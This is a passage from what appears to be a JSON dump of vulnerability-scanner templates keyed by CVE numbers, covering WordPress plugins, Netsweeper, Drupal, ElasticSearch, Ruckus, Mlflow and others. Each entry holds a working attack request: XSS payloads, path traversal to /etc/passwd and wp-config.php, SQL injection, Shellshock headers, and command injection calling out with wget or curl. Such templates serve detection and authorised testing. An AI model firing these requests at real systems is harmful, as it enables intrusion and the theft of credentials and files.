Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"unsafe":true,"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/cgi-bin/status","{{BaseURL}}/cgi-bin/stats","{{BaseURL}}/cgi-bin/test","{{BaseURL}}/cgi-bin/status/status.cgi","{{BaseURL}}/test.cgi","{{BaseURL}}/debug.cgi","{{BaseURL}}/cgi-bin/test-cgi"],"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - SSRF in SearchPublicRegistries.jsp","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": 